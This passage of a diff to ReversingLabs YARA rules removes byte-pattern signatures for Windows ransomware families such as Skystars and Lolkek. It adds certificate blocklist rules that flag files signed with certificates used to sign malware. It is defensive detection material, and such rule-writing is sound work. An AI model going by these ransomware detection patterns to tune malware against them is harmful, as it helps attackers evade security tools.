-            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 50 FF 15
-        }
-		$encrypt_files_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ??
-            ?? ?? 7F ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D
-            ?? ?? ?? ?? 83 C1 ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 68
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
-            51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? ??
-            ?? 7F ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ??
-            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-        }
-		$encrypt_files_p3 = {
-            C4 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 45
-            ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ??
-            ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 6A
-            ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            3B 95 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BC 05 ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 69 8D ?? ?? ?? ?? ?? ?? ?? ?? 81 BC 0D ?? ?? ?? ?? ?? ?? ??
-            ?? 74 ?? FF 15 ?? ?? ?? ?? 69 95 ?? ?? ?? ?? ?? ?? ?? ?? 3B 84 15 ?? ?? ?? ?? 74 ??
-            69 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8C 05 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ??
-            ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$enum_resources = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45
-            ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ??
-            ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 73 ?? 8B 45 ?? C1 E0 ?? 8B
-            4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 6A ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? EB ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 4D ?? 33
-            CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" and 1647302400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Skystars : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Skystars ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9dc19bda-c5bd-58fb-8c4f-a7d8a6fbbce9"
-		date = "2020-11-20"
-		modified = "2020-11-20"
+		id = "727167de-5678-558d-b948-8a40839d0500"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Skystars.yara#L1-L97"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "352d22183b0974908ce684725fe85b4714ac5959c3bddf093b54383195881a5a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11516-L11534"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e275a1fd2eb931030fa8b5fc11cd1b335835aaa553a42455053cb93fef5e6e72"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Skystars"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50
-            6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB
-            74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D
-            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33
-        }
-		$search_files_p2 = {
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ??
-            ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
-            ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
-            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
-            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ??
-            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03
-            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68
-            ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
-            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 68 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
-            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
-            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$main_routine = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
-            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50
-            E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 89 45
-            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ??
-            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMART TOYS AND GAMES, INC" and ( pe.signatures [ i ] . serial == "00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" or pe.signatures [ i ] . serial == "9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" ) and 1601683200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Lolkek : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Lolkek ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "441badd6-3708-5f74-90f3-4d3a0fc45aff"
-		date = "2020-10-23"
-		modified = "2020-10-23"
+		id = "0a196a18-002e-58e4-bff2-83d1a67a82ce"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Lolkek.yara#L1-L106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d18545b25a33bba1a6e01ab37768bd4f15fb125dcb8cbe7909d9a8bbe08e63fa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11536-L11554"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2a9f13f5e79a12f7e9d9d4a0dcaac065e1fc5167c67bc9f3fd7ba1c374b26d96"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Lolkek"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99
-            F7 F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF D3 83
-            C4 ?? 56 57 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
-            6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 F7
-            F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 85 FF 0F 85 ?? ?? ?? ?? 5E 5B 33 C0 5F C2
-        }
-		$find_volumes_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
-            57 E8 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 83 C4 ?? 89 74 24 ?? 33
-        }
-		$find_volumes_p2 = {
-            FF 8B 5C BC ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 9C B4 ?? ?? ?? ?? 46 47 83 FF
-            ?? 7C ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 57 FF 15 ??
-            ?? ?? ?? 8B D8 0F 1F 00 85 F6 74 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 57
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74
-            ?? 4E 57 FF B4 B4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF
-            D7 33 D2 B9 ?? ?? ?? ?? F7 F1 68 ?? ?? ?? ?? 80 C2 ?? 88 94 34 ?? ?? ?? ?? FF D3 46
-            83 FE ?? 7C ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 15
-        }
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
-            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
-            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
-            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
-            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
-            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
-            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
-        }
